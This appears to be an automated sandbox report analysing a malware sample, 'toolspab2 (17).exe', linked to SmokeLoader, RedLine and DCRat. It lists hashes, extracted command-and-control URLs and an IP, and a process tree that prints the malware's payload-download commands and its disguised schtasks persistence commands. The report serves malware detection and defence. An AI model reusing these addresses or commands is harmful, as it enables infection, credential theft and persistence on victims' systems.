Overview

overview

10

Static

static

toolspab2 (1).exe

windows7_x64

10

toolspab2 (1).exe

windows10_x64

10

toolspab2 (10).exe

windows7_x64

10

toolspab2 (10).exe

windows10_x64

10

toolspab2 (11).exe

windows7_x64

10

toolspab2 (11).exe

windows10_x64

10

toolspab2 (12).exe

windows7_x64

10

toolspab2 (12).exe

windows10_x64

10

toolspab2 (13).exe

windows7_x64

10

toolspab2 (13).exe

windows10_x64

10

toolspab2 (14).exe

windows7_x64

10

toolspab2 (14).exe

windows10_x64

10

toolspab2 (15).exe

windows7_x64

10

toolspab2 (15).exe

windows10_x64

10

toolspab2 (16).exe

windows7_x64

10

toolspab2 (16).exe

windows10_x64

10

toolspab2 (17).exe

windows7_x64

10

toolspab2 (17).exe

windows10_x64

10

toolspab2 (18).exe

windows7_x64

10

toolspab2 (18).exe

windows10_x64

10

toolspab2 (19).exe

windows7_x64

10

toolspab2 (19).exe

windows10_x64

10

toolspab2 (2).exe

windows7_x64

10

toolspab2 (2).exe

windows10_x64

10

toolspab2 (20).exe

windows7_x64

10

toolspab2 (20).exe

windows10_x64

10

toolspab2 (21).exe

windows7_x64

10

toolspab2 (21).exe

windows10_x64

10

toolspab2 (22).exe

windows7_x64

10

toolspab2 (22).exe

windows10_x64

10

toolspab2 (23).exe

windows7_x64

10

toolspab2 (23).exe

windows10_x64

10

Resubmissions

12-07-2021 16:55

210712-cvz622xsbj 10

10-07-2021 13:25

210710-pdfh7kft96 10

09-07-2021 23:00

210709-hewxkm1xlj 10

09-07-2021 16:08

210709-5ql27kyjqa 10

09-07-2021 14:08

210709-pt977a4bhe 10

08-07-2021 22:09

210708-3ypfnj5j7x 10

08-07-2021 13:30

210708-4hsk7y9f2x 10

08-07-2021 12:14

210708-8t5f9z9egj 10

Analysis

  • max time kernel
    1800s
  • max time network
    1803s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    08-07-2021 12:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    toolspab2 (17).exe

  • Size

    315KB

  • MD5

    1d20e1f65938e837ef1b88f10f1bd6c3

  • SHA1

    703d7098dbfc476d2181b7fc041cc23e49c368f1

  • SHA256

    05cd7440851f13dd8f489bb3c06eba385d85d7d9a77a612049c04c541a88593d

  • SHA512

    f9d333abe1f721b8d45d7bc6b5f286af09a8d233bd1d41f0ad891840cf742364aeca2cb6ccd6543f56a8eaf32804f82f72f961d16d5ba663ad706d164915a196

Score
10/10
dcratredlinesmokeloaderagressorbackdoordiscoveryinfostealerratspywarestealertrojanupx

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

agressor

C2

65.21.122.45:8085

Signatures

  • DCrat 2 IoCs

    DarkCrystalrat.

    rat
  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

    ratinfostealerdcrat
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 2 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • DCRat Payload 10 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

    rat
  • Downloads MZ/PE file
  • Executes dropped EXE 17 IoCs
  • UPX packed file 7 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Deletes itself 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 6 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies registry class 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: MapViewOfSection 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\toolspab2 (17).exe
    "C:\Users\Admin\AppData\Local\Temp\toolspab2 (17).exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:4428
    • C:\Users\Admin\AppData\Local\Temp\toolspab2 (17).exe
      "C:\Users\Admin\AppData\Local\Temp\toolspab2 (17).exe"
      2⤵
      • Loads dropped DLL
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:5112
  • C:\Users\Admin\AppData\Local\Temp\2E25.exe
    C:\Users\Admin\AppData\Local\Temp\2E25.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:3644
  • C:\Windows\SysWOW64\explorer.exe
    C:\Windows\SysWOW64\explorer.exe
    1⤵
      PID:2332
    • C:\Windows\explorer.exe
      C:\Windows\explorer.exe
      1⤵
        PID:4032
      • C:\Windows\SysWOW64\explorer.exe
        C:\Windows\SysWOW64\explorer.exe
        1⤵
          PID:4108
        • C:\Windows\explorer.exe
          C:\Windows\explorer.exe
          1⤵
            PID:3164
          • C:\Windows\SysWOW64\explorer.exe
            C:\Windows\SysWOW64\explorer.exe
            1⤵
              PID:3976
            • C:\Windows\explorer.exe
              C:\Windows\explorer.exe
              1⤵
                PID:4188
              • C:\Windows\SysWOW64\explorer.exe
                C:\Windows\SysWOW64\explorer.exe
                1⤵
                  PID:4260
                • C:\Windows\explorer.exe
                  C:\Windows\explorer.exe
                  1⤵
                    PID:4280
                  • C:\Windows\SysWOW64\explorer.exe
                    C:\Windows\SysWOW64\explorer.exe
                    1⤵
                      PID:4384
                    • C:\Users\Admin\AppData\Roaming\biguvwh
                      C:\Users\Admin\AppData\Roaming\biguvwh
                      1⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • Suspicious use of WriteProcessMemory
                      PID:2148
                      • C:\Users\Admin\AppData\Roaming\biguvwh
                        C:\Users\Admin\AppData\Roaming\biguvwh
                        2⤵
                        • Executes dropped EXE
                        PID:2272
                    • C:\Users\Admin\AppData\Roaming\biguvwh
                      C:\Users\Admin\AppData\Roaming\biguvwh
                      1⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • Suspicious use of WriteProcessMemory
                      PID:3440
                      • C:\Users\Admin\AppData\Roaming\biguvwh
                        C:\Users\Admin\AppData\Roaming\biguvwh
                        2⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:1012
                    • C:\Users\Admin\AppData\Local\Temp\FE02.exe
                      C:\Users\Admin\AppData\Local\Temp\FE02.exe
                      1⤵
                      • Executes dropped EXE
                      • Suspicious use of WriteProcessMemory
                      PID:3836
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\14.tmp\15.tmp\16.bat C:\Users\Admin\AppData\Local\Temp\FE02.exe"
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2216
                        • C:\Users\Admin\AppData\Local\Temp\14.tmp\15.tmp\extd.exe
                          C:\Users\Admin\AppData\Local\Temp\14.tmp\15.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
                          3⤵
                          • Executes dropped EXE
                          PID:3980
                        • C:\Users\Admin\AppData\Local\Temp\14.tmp\15.tmp\extd.exe
                          C:\Users\Admin\AppData\Local\Temp\14.tmp\15.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/862256247017701399/862656906162077706/ost.exe" "ost.exe" "" "" "" "" "" ""
                          3⤵
                          • Executes dropped EXE
                          PID:4928
                        • C:\Users\Admin\AppData\Local\Temp\14.tmp\15.tmp\extd.exe
                          C:\Users\Admin\AppData\Local\Temp\14.tmp\15.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/862256247017701399/862373640586133504/cmd.exe" "cmd.exe" "" "" "" "" "" ""
                          3⤵
                          • Executes dropped EXE
                          PID:4432
                        • C:\Users\Admin\AppData\Local\Temp\1822\ost.exe
                          ost.exe
                          3⤵
                          • Executes dropped EXE
                          • Drops file in System32 directory
                          • Drops file in Windows directory
                          • Modifies registry class
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4892
                          • C:\Windows\SYSTEM32\schtasks.exe
                            "schtasks" /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\csrss.exe'" /rl HIGHEST /f
                            4⤵
                            • Creates scheduled task(s)
                            PID:4932
                          • C:\Windows\SYSTEM32\schtasks.exe
                            "schtasks" /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\mib\explorer.exe'" /rl HIGHEST /f
                            4⤵
                            • Creates scheduled task(s)
                            PID:2892
                          • C:\Windows\SYSTEM32\schtasks.exe
                            "schtasks" /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\System32\EnterpriseDesktopAppMgmtCSP\dllhost.exe'" /rl HIGHEST /f
                            4⤵
                            • Creates scheduled task(s)
                            PID:4568
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\k7BrOBmS9I.bat"
                            4⤵
                              PID:4004
                              • C:\Windows\system32\chcp.com
                                chcp 65001
                                5⤵
                                  PID:4292
                                • C:\Windows\system32\PING.EXE
                                  ping -n 5 localhost
                                  5⤵
                                  • Runs ping.exe
                                  PID:4264
                                • C:\Recovery\WindowsRE\csrss.exe
                                  "C:\Recovery\WindowsRE\csrss.exe"
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious behavior: GetForegroundWindowSpam
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3356
                            • C:\Users\Admin\AppData\Local\Temp\1822\cmd.exe
                              cmd.exe
                              3⤵
                              • Executes dropped EXE
                              • Modifies registry class
                              PID:4896
                              • C:\Windows\SysWOW64\WScript.exe
                                "C:\Windows\System32\WScript.exe" "C:\fontWinnetDhcp\exmIkg.vbe"
                                4⤵
                                  PID:2228
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c ""C:\fontWinnetDhcp\Kam3E.bat" "
                                    5⤵
                                      PID:1832
                                      • C:\fontWinnetDhcp\fontWinnetDhcpfontref.exe
                                        "C:\fontWinnetDhcp\fontWinnetDhcpfontref.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        • Drops file in Windows directory
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4116
                                        • C:\Windows\SYSTEM32\schtasks.exe
                                          "schtasks" /create /tn "winlogon" /sc ONLOGON /tr "'C:\Users\Default\Links\winlogon.exe'" /rl HIGHEST /f
                                          7⤵
                                          • Creates scheduled task(s)
                                          PID:4532
                                        • C:\Windows\SYSTEM32\schtasks.exe
                                          "schtasks" /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Admin\Searches\conhost.exe'" /rl HIGHEST /f
                                          7⤵
                                          • Creates scheduled task(s)
                                          PID:3336
                                        • C:\Windows\SYSTEM32\schtasks.exe
                                          "schtasks" /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\write\explorer.exe'" /rl HIGHEST /f
                                          7⤵
                                          • Creates scheduled task(s)
                                          PID:4992
                                        • C:\Users\Default\Links\winlogon.exe
                                          "C:\Users\Default\Links\winlogon.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5000
                                • C:\Users\Admin\AppData\Local\Temp\14.tmp\15.tmp\extd.exe
                                  C:\Users\Admin\AppData\Local\Temp\14.tmp\15.tmp\extd.exe "" "" "" "" "" "" "" "" ""
                                  3⤵
                                  • Executes dropped EXE
                                  PID:3940
                            • C:\Users\Admin\AppData\Roaming\biguvwh
                              C:\Users\Admin\AppData\Roaming\biguvwh
                              1⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              PID:1404
                              • C:\Users\Admin\AppData\Roaming\biguvwh
                                C:\Users\Admin\AppData\Roaming\biguvwh
                                2⤵
                                • Executes dropped EXE
                                PID:1920

                            Network

                            MITRE ATT&CK Enterprise v6

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • memory/1404-246-0x0000000000460000-0x000000000050E000-memory.dmp

                              Filesize

                              696KB

                              Download

                            • memory/2148-174-0x0000000000550000-0x000000000069A000-memory.dmp

                              Filesize

                              1.3MB

                              Download

                            • memory/2332-125-0x0000000002B80000-0x0000000002BEB000-memory.dmp

                              Filesize

                              428KB

                              Download

                            • memory/2332-124-0x0000000002E00000-0x0000000002E74000-memory.dmp

                              Filesize

                              464KB

                              Download

                            • memory/2416-119-0x0000000000FA0000-0x0000000000FB7000-memory.dmp

                              Filesize

                              92KB

                              Download

                            • memory/2416-183-0x0000000001450000-0x0000000001467000-memory.dmp

                              Filesize

                              92KB

                              Download

                            • memory/3164-133-0x00000000006A0000-0x00000000006A9000-memory.dmp

                              Filesize

                              36KB

                              Download

                            • memory/3164-134-0x0000000000690000-0x000000000069F000-memory.dmp

                              Filesize

                              60KB

                              Download

                            • memory/3356-240-0x000000001C602000-0x000000001C603000-memory.dmp

                              Filesize

                              4KB

                              Download

                            • memory/3440-181-0x0000000000460000-0x00000000005AA000-memory.dmp

                              Filesize

                              1.3MB

                              Download

                            • memory/3644-148-0x0000000000400000-0x000000000046F000-memory.dmp

                              Filesize

                              444KB

                              Download

                            • memory/3644-142-0x0000000005090000-0x0000000005091000-memory.dmp

                              Filesize

                              4KB

                              Download

                            • memory/3644-157-0x0000000005780000-0x0000000005781000-memory.dmp

                              Filesize

                              4KB

                              Download

                            • memory/3644-150-0x0000000004B80000-0x0000000004B81000-memory.dmp

                              Filesize

                              4KB

                              Download

                            • memory/3644-151-0x0000000004B82000-0x0000000004B83000-memory.dmp

                              Filesize

                              4KB

                              Download

                            • memory/3644-164-0x00000000063C0000-0x00000000063C1000-memory.dmp

                              Filesize

                              4KB

                              Download

                            • memory/3644-147-0x0000000000470000-0x00000000005BA000-memory.dmp

                              Filesize

                              1.3MB

                              Download

                            • memory/3644-152-0x0000000004B83000-0x0000000004B84000-memory.dmp

                              Filesize

                              4KB

                              Download

                            • memory/3644-167-0x0000000006FB0000-0x0000000006FB1000-memory.dmp

                              Filesize

                              4KB

                              Download

                            • memory/3644-165-0x0000000006590000-0x0000000006591000-memory.dmp

                              Filesize

                              4KB

                              Download

                            • memory/3644-166-0x0000000006B40000-0x0000000006B41000-memory.dmp

                              Filesize

                              4KB

                              Download

                            • memory/3644-139-0x00000000021B0000-0x00000000021CB000-memory.dmp

                              Filesize

                              108KB

                              Download

                            • memory/3644-144-0x0000000004AA0000-0x0000000004AA1000-memory.dmp

                              Filesize

                              4KB

                              Download

                            • memory/3644-143-0x0000000002540000-0x0000000002541000-memory.dmp

                              Filesize

                              4KB

                              Download

                            • memory/3644-153-0x0000000004B84000-0x0000000004B86000-memory.dmp

                              Filesize

                              8KB

                              Download

                            • memory/3644-156-0x0000000004AE0000-0x0000000004AE1000-memory.dmp

                              Filesize

                              4KB

                              Download

                            • memory/3644-141-0x0000000002390000-0x00000000023A9000-memory.dmp

                              Filesize

                              100KB

                              Download

                            • memory/3644-140-0x0000000004B90000-0x0000000004B91000-memory.dmp

                              Filesize

                              4KB

                              Download

                            • memory/3976-136-0x0000000002790000-0x0000000002795000-memory.dmp

                              Filesize

                              20KB

                              Download

                            • memory/3976-137-0x0000000002780000-0x0000000002789000-memory.dmp

                              Filesize

                              36KB

                              Download

                            • memory/4032-127-0x0000000000680000-0x0000000000687000-memory.dmp

                              Filesize

                              28KB

                              Download

                            • memory/4032-128-0x00000000003F0000-0x00000000003FC000-memory.dmp

                              Filesize

                              48KB

                              Download

                            • memory/4108-131-0x0000000002CA0000-0x0000000002CAB000-memory.dmp

                              Filesize

                              44KB

                              Download

                            • memory/4108-130-0x0000000002CB0000-0x0000000002CB7000-memory.dmp

                              Filesize

                              28KB

                              Download

                            • memory/4116-225-0x000000001BAC0000-0x000000001BAC2000-memory.dmp

                              Filesize

                              8KB

                              Download

                            • memory/4116-220-0x0000000000BE0000-0x0000000000BE1000-memory.dmp

                              Filesize

                              4KB

                              Download

                            • memory/4188-146-0x0000000000300000-0x000000000030C000-memory.dmp

                              Filesize

                              48KB

                              Download

                            • memory/4188-145-0x0000000000310000-0x0000000000316000-memory.dmp

                              Filesize

                              24KB

                              Download

                            • memory/4260-155-0x0000000002EE0000-0x0000000002EE9000-memory.dmp

                              Filesize

                              36KB

                              Download

                            • memory/4260-154-0x0000000002EF0000-0x0000000002EF4000-memory.dmp

                              Filesize

                              16KB

                              Download

                            • memory/4280-160-0x0000000000BD0000-0x0000000000BD9000-memory.dmp

                              Filesize

                              36KB

                              Download

                            • memory/4280-159-0x0000000000BE0000-0x0000000000BE5000-memory.dmp

                              Filesize

                              20KB

                              Download

                            • memory/4384-162-0x0000000002AC0000-0x0000000002AC5000-memory.dmp

                              Filesize

                              20KB

                              Download

                            • memory/4384-163-0x0000000002AB0000-0x0000000002AB9000-memory.dmp

                              Filesize

                              36KB

                              Download

                            • memory/4428-117-0x00000000004C0000-0x00000000004CC000-memory.dmp

                              Filesize

                              48KB

                              Download

                            • memory/4892-210-0x000000001B8E0000-0x000000001B8E2000-memory.dmp

                              Filesize

                              8KB

                              Download

                            • memory/4892-200-0x0000000000A80000-0x0000000000A81000-memory.dmp

                              Filesize

                              4KB

                              Download

                            • memory/5000-239-0x000000001B160000-0x000000001B162000-memory.dmp

                              Filesize

                              8KB

                              Download

                            • memory/5112-114-0x0000000000400000-0x000000000040C000-memory.dmp

                              Filesize

                              48KB

                              Download